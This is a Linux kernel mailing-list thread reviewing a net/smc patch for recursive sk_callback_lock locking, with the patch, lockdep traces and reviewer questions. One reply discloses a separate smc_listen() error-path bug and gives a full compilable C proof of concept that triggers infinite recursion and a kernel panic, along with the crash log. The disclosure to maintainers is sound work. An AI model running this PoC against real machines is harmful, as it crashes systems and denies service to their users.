* [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready
@ 2026-06-17 15:28 Runyu Xiao
2026-06-18 6:24 ` Mahanta Jambigi
` (3 more replies)
0 siblings, 4 replies; 9+ messages in thread
From: Runyu Xiao @ 2026-06-17 15:28 UTC (permalink / raw)
To: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni
Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul,
linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu,
runyu.xiao, stable
smc_listen() installs smc_clcsock_data_ready() as the underlying TCP
listen socket's sk_data_ready callback. smc_clcsock_data_ready() then
immediately takes sk_callback_lock before looking up the SMC listener and
queuing smc_tcp_listen_work().
That is unsafe once the TCP listen socket is leaving TCP_LISTEN. The TCP
close/flush path can run the installed sk_data_ready callback with
sk_callback_lock already held, so entering smc_clcsock_data_ready() again
tries to take the same rwlock recursively in the same thread. The nvmet
TCP listener had to make the same state check before taking
sk_callback_lock for this reason.
This issue was found by our static analysis tool and then manually
reviewed against the current tree.
The grounded PoC kept the SMC listen callback installation path:
smc_listen()
smc_clcsock_replace_cb()
sk_data_ready = smc_clcsock_data_ready()
It then modeled the close/flush carrier that invokes the installed
sk_data_ready callback while sk_callback_lock is already held. Lockdep
reported the same-thread recursive acquisition:
WARNING: possible recursive locking detected
smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
smc_close_flush_work+0x1f/0x30 [vuln_msv]
*** DEADLOCK ***
Return before taking sk_callback_lock when the underlying TCP socket is no
longer in TCP_LISTEN. In that state there is no listen accept work to
queue for SMC, and avoiding the callback lock mirrors the fix used by the
TCP nvmet listener.
Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
Cc: stable@vger.kernel.org
Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
---
net/smc/af_smc.c | 3 +++
1 file changed, 3 insertions(+)
diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
index 6421c2e1c84d..1af4e3c333ff 100644
--- a/net/smc/af_smc.c
+++ b/net/smc/af_smc.c
@@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
{
struct smc_sock *lsmc;
+ if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
+ return;
+
read_lock_bh(&listen_clcsock->sk_callback_lock);
lsmc = smc_clcsock_user_data(listen_clcsock);
if (!lsmc)
--
2.34.1
^ permalink raw reply related [flat|nested] 9+ messages in thread* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready 2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao @ 2026-06-18 6:24 ` Mahanta Jambigi 2026-06-18 14:16 ` Runyu Xiao 2026-06-19 5:48 ` [PATCH net v2] " Runyu Xiao ` (2 subsequent siblings) 3 siblings, 1 reply; 9+ messages in thread From: Mahanta Jambigi @ 2026-06-18 6:24 UTC (permalink / raw) To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable On 17/06/26 8:58 pm, Runyu Xiao wrote: > smc_listen() installs smc_clcsock_data_ready() as the underlying TCP > listen socket's sk_data_ready callback. smc_clcsock_data_ready() then > immediately takes sk_callback_lock before looking up the SMC listener and > queuing smc_tcp_listen_work(). > > That is unsafe once the TCP listen socket is leaving TCP_LISTEN. The TCP > close/flush path can run the installed sk_data_ready callback with > sk_callback_lock already held, so entering smc_clcsock_data_ready() again > tries to take the same rwlock recursively in the same thread. The nvmet Could you provide me the exact call stack showing recursive lock? Also help me with the nvmet commit details. > TCP listener had to make the same state check before taking > sk_callback_lock for this reason. > > This issue was found by our static analysis tool and then manually > reviewed against the current tree. > > The grounded PoC kept the SMC listen callback installation path: > > smc_listen() > smc_clcsock_replace_cb() > sk_data_ready = smc_clcsock_data_ready() > > It then modeled the close/flush carrier that invokes the installed > sk_data_ready callback while sk_callback_lock is already held. Lockdep > reported the same-thread recursive acquisition: > > WARNING: possible recursive locking detected > smc_clcsock_data_ready+0xa/0x4d [vuln_msv] > smc_close_flush_work+0x1f/0x30 [vuln_msv] > *** DEADLOCK *** > > Return before taking sk_callback_lock when the underlying TCP socket is no > longer in TCP_LISTEN. In that state there is no listen accept work to > queue for SMC, and avoiding the callback lock mirrors the fix used by the > TCP nvmet listener. > > Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback") > Cc: stable@vger.kernel.org > Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn> > --- > net/smc/af_smc.c | 3 +++ > 1 file changed, 3 insertions(+) > > diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c > index 6421c2e1c84d..1af4e3c333ff 100644 > --- a/net/smc/af_smc.c > +++ b/net/smc/af_smc.c > @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock) > { > struct smc_sock *lsmc; > > + if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN) Is *TCP_LISTEN* check sufficient? What about *TCP_SYN_RECV* or *TCP_ESTABLISHED*? > + return; > + > read_lock_bh(&listen_clcsock->sk_callback_lock); > lsmc = smc_clcsock_user_data(listen_clcsock); > if (!lsmc) ^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready 2026-06-18 6:24 ` Mahanta Jambigi @ 2026-06-18 14:16 ` Runyu Xiao 2026-06-19 5:36 ` Mahanta Jambigi 0 siblings, 1 reply; 9+ messages in thread From: Runyu Xiao @ 2026-06-18 14:16 UTC (permalink / raw) To: Mahanta Jambigi, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, runyu.xiao Hi, Thanks for taking a look. The exact Lockdep stack I have is from the grounded reproducer, not from a production SMC setup. The reproducer keeps the same callback shape: the close/flush side holds sk_callback_lock and invokes the installed sk_data_ready callback, which re-enters smc_clcsock_data_ready() and tries to take sk_callback_lock again. The relevant Lockdep report is: WARNING: possible recursive locking detected kworker/u4:3/39 is trying to acquire lock: (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d but task is already holding lock: (sk_callback_lock) at smc_close_flush_work+0xc/0x30 Possible unsafe locking scenario: CPU0 ---- lock(sk_callback_lock); lock(sk_callback_lock); *** DEADLOCK *** Workqueue: smc_close_wq smc_close_flush_work Call Trace: dump_stack_lvl __lock_acquire lock_acquire _raw_read_lock_bh smc_clcsock_data_ready+0xa/0x4d smc_close_flush_work+0x1f/0x30 process_one_work worker_thread kthread ret_from_fork The nvmet change I referred to is: 2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()") The stable/backport patch I originally used as the reference is: 1c90f930e7b4 ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()") Its commit message says that when the socket is closed while in TCP_LISTEN, the flush callback can call nvmet_tcp_listen_data_ready() with sk_callback_lock already held, so nvmet moved the TCP_LISTEN check before taking sk_callback_lock. For the TCP_LISTEN check: my reasoning was that smc_clcsock_data_ready() is installed by smc_listen() on the underlying TCP listen socket and only queues smc_tcp_listen_work() for the SMC listen/accept path. Once that underlying socket is no longer in TCP_LISTEN, there should be no SMC listen accept work to queue from this callback. TCP_SYN_RECV and TCP_ESTABLISHED are not listen-socket states for this callback path, so I did not intend the callback to queue listen work for those states. That said, if SMC expects smc_clcsock_data_ready() to handle a non-LISTEN state during fallback or another transition, then the proposed check is too strict and I should rework the fix. Thanks, Runyu ^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready 2026-06-18 14:16 ` Runyu Xiao @ 2026-06-19 5:36 ` Mahanta Jambigi 0 siblings, 0 replies; 9+ messages in thread From: Mahanta Jambigi @ 2026-06-19 5:36 UTC (permalink / raw) To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni Cc: Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu On 18/06/26 7:46 pm, Runyu Xiao wrote: > Hi, > > Thanks for taking a look. > > The exact Lockdep stack I have is from the grounded reproducer, not from > a production SMC setup. The reproducer keeps the same callback shape: > the close/flush side holds sk_callback_lock and invokes the installed > sk_data_ready callback, which re-enters smc_clcsock_data_ready() and tries > to take sk_callback_lock again. > > The relevant Lockdep report is: > > WARNING: possible recursive locking detected > kworker/u4:3/39 is trying to acquire lock: > (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d > > but task is already holding lock: > (sk_callback_lock) at smc_close_flush_work+0xc/0x30 > > Possible unsafe locking scenario: > > CPU0 > ---- > lock(sk_callback_lock); > lock(sk_callback_lock); > > *** DEADLOCK *** > > Workqueue: smc_close_wq smc_close_flush_work > > Call Trace: > dump_stack_lvl > __lock_acquire > lock_acquire > _raw_read_lock_bh > smc_clcsock_data_ready+0xa/0x4d > smc_close_flush_work+0x1f/0x30 > process_one_work > worker_thread > kthread > ret_from_fork Thank you for addressing the feedback. My suggestion would be to reply to the original email thread where the review comments were given, so that the maintainers can follow the conversation. https://www.kernel.org/doc/html/latest/process/submitting-patches.html#respond-to-review-comments Please include above call stack in your next version. > > The nvmet change I referred to is: > > 2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()") Please include this info in your next version. > > The stable/backport patch I originally used as the reference is: > > 1c90f930e7b4 ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()") > > Its commit message says that when the socket is closed while in > TCP_LISTEN, the flush callback can call nvmet_tcp_listen_data_ready() > with sk_callback_lock already held, so nvmet moved the TCP_LISTEN check > before taking sk_callback_lock. > > For the TCP_LISTEN check: my reasoning was that smc_clcsock_data_ready() > is installed by smc_listen() on the underlying TCP listen socket and only > queues smc_tcp_listen_work() for the SMC listen/accept path. Once that > underlying socket is no longer in TCP_LISTEN, there should be no SMC > listen accept work to queue from this callback. TCP_SYN_RECV and > TCP_ESTABLISHED are not listen-socket states for this callback path, so I > did not intend the callback to queue listen work for those states. I understand. Please include this info in your next version. > > That said, if SMC expects smc_clcsock_data_ready() to handle a non-LISTEN > state during fallback or another transition, then the proposed check is > too strict and I should rework the fix. > > Thanks, > Runyu ^ permalink raw reply [flat|nested] 9+ messages in thread
* [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready 2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao 2026-06-18 6:24 ` Mahanta Jambigi @ 2026-06-19 5:48 ` Runyu Xiao 2026-06-23 10:38 ` XIAO WU 2026-06-19 6:35 ` [PATCH net] " Dust Li 2026-06-25 8:32 ` Sidraya Jayagond 3 siblings, 1 reply; 9+ messages in thread From: Runyu Xiao @ 2026-06-19 5:48 UTC (permalink / raw) To: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, runyu.xiao, stable smc_listen() installs smc_clcsock_data_ready() as the underlying TCP listen socket's sk_data_ready callback. The callback takes sk_callback_lock before looking up the SMC listener and queuing smc_tcp_listen_work(). This can recurse when the underlying TCP listen socket is being closed. The close/flush path may invoke the installed sk_data_ready callback with sk_callback_lock already held, so smc_clcsock_data_ready() tries to take the same rwlock again in the same thread. This issue was found by our static analysis tool and then manually reviewed against the current tree. The reproducer keeps the SMC listen callback installation path: smc_listen() smc_clcsock_replace_cb() sk_data_ready = smc_clcsock_data_ready() It then models the close/flush carrier that invokes the installed sk_data_ready callback while sk_callback_lock is already held. Lockdep reports the same-thread recursive acquisition: WARNING: possible recursive locking detected kworker/u4:3/39 is trying to acquire lock: (sk_callback_lock) at smc_clcsock_data_ready+0xa/0x4d but task is already holding lock: (sk_callback_lock) at smc_close_flush_work+0xc/0x30 Possible unsafe locking scenario: CPU0 ---- lock(sk_callback_lock); lock(sk_callback_lock); *** DEADLOCK *** Workqueue: smc_close_wq smc_close_flush_work Call Trace: dump_stack_lvl __lock_acquire lock_acquire _raw_read_lock_bh smc_clcsock_data_ready smc_close_flush_work process_one_work worker_thread kthread ret_from_fork The same pattern was fixed for nvmet TCP by checking TCP_LISTEN before taking sk_callback_lock: commit 2fa8961d3a6a ("nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()") Do the same for SMC. smc_clcsock_data_ready() is installed by smc_listen() on the underlying TCP listen socket and only queues smc_tcp_listen_work() for the SMC listen/accept path. Once that socket is no longer in TCP_LISTEN, there is no listen accept work to queue from this callback, and avoiding sk_callback_lock also avoids the recursive locking path. Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback") Cc: stable@vger.kernel.org Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn> --- v2: - Include the fuller Lockdep stack from the grounded reproducer. - Add the related nvmet TCP fix reference. - Explain why the TCP_LISTEN check is valid for the SMC listen callback. net/smc/af_smc.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c index 6421c2e1c84d..1af4e3c333ff 100644 --- a/net/smc/af_smc.c +++ b/net/smc/af_smc.c @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock) { struct smc_sock *lsmc; + if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN) + return; + read_lock_bh(&listen_clcsock->sk_callback_lock); lsmc = smc_clcsock_user_data(listen_clcsock); if (!lsmc) -- 2.34.1 ^ permalink raw reply related [flat|nested] 9+ messages in thread
* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready 2026-06-19 5:48 ` [PATCH net v2] " Runyu Xiao @ 2026-06-23 10:38 ` XIAO WU 2026-06-24 10:37 ` Runyu Xiao 0 siblings, 1 reply; 9+ messages in thread From: XIAO WU @ 2026-06-23 10:38 UTC (permalink / raw) To: Runyu Xiao, D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable Hi Runyu, Thanks for this patch. > diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c > index 6421c2e1c84d..1af4e3c333ff 100644 > --- a/net/smc/af_smc.c > +++ b/net/smc/af_smc.c > @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock) > { > struct smc_sock *lsmc; > > + if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN) > + return; > + > read_lock_bh(&listen_clcsock->sk_callback_lock); > lsmc = smc_clcsock_user_data(listen_clcsock); The TCP_LISTEN check before taking sk_callback_lock looks correct and mirrors the same pattern from nvmet TCP. Sashiko AI review also looked at this patch and flagged a separate pre-existing issue nearby — the error path in smc_listen() does not restore icsk_af_ops when kernel_listen() fails: https://sashiko.dev/#/patchset/20260617152855.1039151-1-runyu.xiao@seu.edu.cn The relevant code in smc_listen() (net/smc/af_smc.c, lines ~2687-2704): smc->ori_af_ops = inet_csk(smc->clcsock->sk)->icsk_af_ops; smc->af_ops = *smc->ori_af_ops; smc->af_ops.syn_recv_sock = smc_tcp_syn_recv_sock; inet_csk(smc->clcsock->sk)->icsk_af_ops = &smc->af_ops; if (smc->limit_smc_hs) tcp_sk(smc->clcsock->sk)->smc_hs_congested = smc_hs_congested; rc = kernel_listen(smc->clcsock, backlog); if (rc) { write_lock_bh(&smc->clcsock->sk->sk_callback_lock); smc_clcsock_restore_cb(&smc->clcsock->sk->sk_data_ready, &smc->clcsk_data_ready); rcu_assign_sk_user_data(smc->clcsock->sk, NULL); write_unlock_bh(&smc->clcsock->sk->sk_callback_lock); goto out; } The error path restores sk_data_ready and sk_user_data but leaves icsk_af_ops pointing to &smc->af_ops (whose syn_recv_sock is already set to smc_tcp_syn_recv_sock). I verified this in a QEMU VM and can confirm it triggers a real kernel stack overflow. === Reproduction === Kernel: 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64 Config: ci-qemu-upstream.config (KASAN=y, CONFIG_SMC=y, DEBUG_LIST=y) QEMU: qemu-system-x86_64 -m 2G -smp 2 Trigger sequence: 1. SMC socket A: setsockopt(SO_REUSEADDR), bind to port P → clcsock gets SO_REUSEADDR via smc_bind() copy 2. TCP socket C: setsockopt(SO_REUSEADDR), bind + listen on port P → Both non-TCP_LISTEN at bind time → bind OK → C enters TCP_LISTEN after its listen() 3. listen(A) on SMC → kernel_listen() fails with EADDRINUSE → icsk_af_ops NOT restored → clcsock points to wrapper 4. Close TCP C (free port), listen(A) again → succeeds → ori_af_ops now points to wrapper with syn_recv_sock = smc_tcp_syn_recv_sock 5. TCP connect() to port P → smc_tcp_syn_recv_sock calls itself → infinite recursion → IRQ stack guard page hit → kernel panic === Full PoC === Compile with: gcc -o poc poc.c -static // PoC: Stack overflow via corrupted icsk_af_ops in smc_listen error path #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <netinet/in.h> #include <arpa/inet.h> #ifndef PF_SMC #define PF_SMC 43 #endif #ifndef SMCPROTO_SMC #define SMCPROTO_SMC 0 #endif int main(void) { int smc_a, tcp_c, client; struct sockaddr_in addr; pid_t child; int status, ret; socklen_t len; int val; printf("=== SMC listen error path -> stack overflow PoC ===\n\n"); /* Step 1: SMC socket A with SO_REUSEADDR, bind to any free port */ printf("[1] Create SMC socket A with SO_REUSEADDR\n"); smc_a = socket(PF_SMC, SOCK_STREAM, 0); if (smc_a < 0) { perror("smc socket"); return 1; } val = 1; setsockopt(smc_a, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val)); memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_ANY); addr.sin_port = 0; if (bind(smc_a, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("bind smc_a"); close(smc_a); return 1; } len = sizeof(addr); if (getsockname(smc_a, (struct sockaddr *)&addr, &len) < 0) { perror("getsockname"); close(smc_a); return 1; } int port = ntohs(addr.sin_port); printf(" SMC A bound to port %d\n", port); /* Step 2: TCP socket C with SO_REUSEADDR, bind+listen on same port */ printf("[2] TCP C with SO_REUSEADDR, bind+listen on port %d\n", port); tcp_c = socket(AF_INET, SOCK_STREAM, 0); val = 1; setsockopt(tcp_c, SOL_SOCKET, SO_REUSEADDR, &val, sizeof(val)); memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_ANY); addr.sin_port = htons(port); if (bind(tcp_c, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("bind tcp_c"); close(tcp_c); close(smc_a); return 1; } if (listen(tcp_c, 5) < 0) { perror("listen tcp_c"); close(tcp_c); close(smc_a); return 1; } printf(" TCP C listening on port %d\n", port); /* Step 3: listen(A) should FAIL → icsk_af_ops NOT restored */ printf("[3] listen(SMC A) — expect failure... "); fflush(stdout); ret = listen(smc_a, 5); if (ret == 0) { printf("succeeded! Unexpected.\n"); close(tcp_c); close(smc_a); return 1; } printf("failed: %s\n", strerror(errno)); /* Step 4: Close TCP C to free the port */ printf("[4] Close TCP C to free port %d\n", port); close(tcp_c); sleep(1); /* Step 5: listen(A) again → succeeds but ori_af_ops is self-referential */ printf("[5] listen(SMC A) again... "); fflush(stdout); ret = listen(smc_a, 5); if (ret < 0) { printf("failed: %s, retrying...\n", strerror(errno)); sleep(2); ret = listen(smc_a, 5); } if (ret < 0) { perror("retry"); close(smc_a); return 1; } printf("succeeded! ori_af_ops->syn_recv_sock == smc_tcp_syn_recv_sock\n"); /* Step 6: TCP connect → smc_tcp_syn_recv_sock recursion → STACK OVERFLOW */ printf("[6] TCP connect → triggers infinite recursion...\n"); fflush(stdout); child = fork(); if (child == 0) { client = socket(AF_INET, SOCK_STREAM, 0); if (client < 0) exit(1); memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); addr.sin_port = htons(port); if (connect(client, (struct sockaddr*)&addr, sizeof(addr)) < 0) { perror("connect"); exit(1); } sleep(3); close(client); exit(0); } printf("Waiting for crash...\n"); sleep(5); if (waitpid(child, &status, WNOHANG) == 0) { printf("Child still alive — check dmesg\n"); kill(child, SIGKILL); waitpid(child, NULL, 0); } close(smc_a); return 0; } === Crash Log === Linux syzkaller 7.1.0-rc7-gfa471042f07a #1 SMP PREEMPT_DYNAMIC x86_64 (CONFIG_KASAN=y, CONFIG_SMC=y, CONFIG_DEBUG_LIST=y) [ 1453.562682][ C0] BUG: IRQ stack guard page was hit at ffffc8ffffffff98 (stack is ffffc90000000000..ffffc90000008000) [ 1453.562712][ C0] Oops: stack guard page: 0000 [#1] SMP KASAN NOPTI [ 1453.562733][ C0] CPU: 0 UID: 0 PID: 10840 Comm: poc Not tainted 7.1.0-rc7-gfa471042f07a #1 PREEMPT(full) [ 1453.562756][ C0] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 [ 1453.562767][ C0] RIP: 0010:__lock_acquire+0x417/0x2730 [ 1453.562965][ C0] Call Trace: [ 1453.562970][ C0] <IRQ> [ 1453.562980][ C0] lock_acquire+0x1ae/0x360 [ 1453.562995][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10 [ 1453.563031][ C0] smc_tcp_syn_recv_sock+0xbf/0xb10 [ 1453.563051][ C0] ? smc_tcp_syn_recv_sock+0xab/0xb10 [ 1453.563073][ C0] ? __pfx_smc_tcp_syn_recv_sock+0x10/0x10 [ 1453.563114][ C0] smc_tcp_syn_recv_sock+0x435/0xb10 [ 1453.563158][ C0] smc_tcp_syn_recv_sock+0x435/0xb10 [ 1453.563200][ C0] smc_tcp_syn_recv_sock+0x435/0xb10 [ 1453.563244][ C0] smc_tcp_syn_recv_sock+0x435/0xb10 [... 15+ recursive frames ...] [ 1453.564373][ C0] smc_tcp_syn_recv_sock+0x435/0xb10 [ 1453.564413][ C0] smc_tcp_syn_recv_sock+0x435/0xb10 [ 1453.577027][ C0] RIP: 0033:0x423574 [ 1453.577319][ C0] Kernel panic - not syncing: Fatal exception in interrupt The infinite recursion is visible in the repeated smc_tcp_syn_recv_sock+0x435/0xb10 frames — each iteration calls ori_af_ops->syn_recv_sock(), which is itself, pushing a new frame until the IRQ stack guard page is hit. Thanks, Xiao ^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH net v2] net/smc: avoid recursive sk_callback_lock in listen data_ready 2026-06-23 10:38 ` XIAO WU @ 2026-06-24 10:37 ` Runyu Xiao 0 siblings, 0 replies; 9+ messages in thread From: Runyu Xiao @ 2026-06-24 10:37 UTC (permalink / raw) To: XIAO WU Cc: D. Wythe, Dust Li, Sidraya Jayagond, Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni, Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu Hi Xiao, > the error path in smc_listen() does not restore icsk_af_ops when > kernel_listen() fails Thanks, this looks like a real error-path bug. I will prepare it as a separate fix for smc_listen() rather than folding it into this sk_callback_lock patch. Runyu ^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready 2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao 2026-06-18 6:24 ` Mahanta Jambigi 2026-06-19 5:48 ` [PATCH net v2] " Runyu Xiao @ 2026-06-19 6:35 ` Dust Li 2026-06-25 8:32 ` Sidraya Jayagond 3 siblings, 0 replies; 9+ messages in thread From: Dust Li @ 2026-06-19 6:35 UTC (permalink / raw) To: Runyu Xiao, D. Wythe, Sidraya Jayagond, Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable On 2026-06-17 23:28:55, Runyu Xiao wrote: >smc_listen() installs smc_clcsock_data_ready() as the underlying TCP >listen socket's sk_data_ready callback. smc_clcsock_data_ready() then >immediately takes sk_callback_lock before looking up the SMC listener and >queuing smc_tcp_listen_work(). > >That is unsafe once the TCP listen socket is leaving TCP_LISTEN. The TCP >close/flush path can run the installed sk_data_ready callback with >sk_callback_lock already held, so entering smc_clcsock_data_ready() again >tries to take the same rwlock recursively in the same thread. The nvmet >TCP listener had to make the same state check before taking >sk_callback_lock for this reason. > >This issue was found by our static analysis tool and then manually >reviewed against the current tree. > >The grounded PoC kept the SMC listen callback installation path: > > smc_listen() > smc_clcsock_replace_cb() > sk_data_ready = smc_clcsock_data_ready() > >It then modeled the close/flush carrier that invokes the installed >sk_data_ready callback while sk_callback_lock is already held. Lockdep >reported the same-thread recursive acquisition: > > WARNING: possible recursive locking detected > smc_clcsock_data_ready+0xa/0x4d [vuln_msv] > smc_close_flush_work+0x1f/0x30 [vuln_msv] > *** DEADLOCK *** > >Return before taking sk_callback_lock when the underlying TCP socket is no >longer in TCP_LISTEN. In that state there is no listen accept work to >queue for SMC, and avoiding the callback lock mirrors the fix used by the >TCP nvmet listener. Hi Runyu, I noticed the lockdep splat comes from your own kernel module ([vuln_msv]) that models the condition, rather than from a real TCP code path. Could you point me to the specific mainline TCP code path that calls sk_data_ready() while holding sk_callback_lock? If such a path exists, I'm happy to take this patch. But if this is based solely on static analysis without a confirmed real call chain, I'd prefer to focus our review bandwidth on issues that have demonstrated impact. Thanks, Dust ^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready 2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao ` (2 preceding siblings ...) 2026-06-19 6:35 ` [PATCH net] " Dust Li @ 2026-06-25 8:32 ` Sidraya Jayagond 3 siblings, 0 replies; 9+ messages in thread From: Sidraya Jayagond @ 2026-06-25 8:32 UTC (permalink / raw) To: Runyu Xiao, D. Wythe, Dust Li, Wenjia Zhang, David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni Cc: Mahanta Jambigi, Tony Lu, Wen Gu, Simon Horman, Karsten Graul, linux-rdma, linux-s390, netdev, linux-kernel, jianhao.xu, stable On 17/06/26 8:58 pm, Runyu Xiao wrote: > smc_listen() installs smc_clcsock_data_ready() as the underlying TCP > listen socket's sk_data_ready callback. smc_clcsock_data_ready() then > immediately takes sk_callback_lock before looking up the SMC listener and > queuing smc_tcp_listen_work(). > > That is unsafe once the TCP listen socket is leaving TCP_LISTEN. The TCP > close/flush path can run the installed sk_data_ready callback with > sk_callback_lock already held, so entering smc_clcsock_data_ready() again > tries to take the same rwlock recursively in the same thread. The nvmet > TCP listener had to make the same state check before taking > sk_callback_lock for this reason. > > This issue was found by our static analysis tool and then manually > reviewed against the current tree. > > The grounded PoC kept the SMC listen callback installation path: > > smc_listen() > smc_clcsock_replace_cb() > sk_data_ready = smc_clcsock_data_ready() > > It then modeled the close/flush carrier that invokes the installed > sk_data_ready callback while sk_callback_lock is already held. Lockdep > reported the same-thread recursive acquisition: > > WARNING: possible recursive locking detected > smc_clcsock_data_ready+0xa/0x4d [vuln_msv] > smc_close_flush_work+0x1f/0x30 [vuln_msv] > *** DEADLOCK *** > > Return before taking sk_callback_lock when the underlying TCP socket is no > longer in TCP_LISTEN. In that state there is no listen accept work to > queue for SMC, and avoiding the callback lock mirrors the fix used by the > TCP nvmet listener. > > Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback") > Cc: stable@vger.kernel.org > Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn> > --- > net/smc/af_smc.c | 3 +++ > 1 file changed, 3 insertions(+) > > diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c > index 6421c2e1c84d..1af4e3c333ff 100644 > --- a/net/smc/af_smc.c > +++ b/net/smc/af_smc.c > @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock) > { > struct smc_sock *lsmc; > > + if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN) > + return; > + In smc_close_active(), the TCP socket remains in TCP_LISTEN state while holding write_lock_bh(&smc->clcsock->sk->sk_callback_lock);. The patch's state check would pass during this window, not preventing the recursive lock scenario. It's unclear whether it fully prevents the recursive locking scenario described in the commit message for the specific code path in smc_close_active(). Could you come up with exact deadlock scenario and how the patch addresses it? > read_lock_bh(&listen_clcsock->sk_callback_lock); > lsmc = smc_clcsock_user_data(listen_clcsock); > if (!lsmc) ^ permalink raw reply [flat|nested] 9+ messages in thread
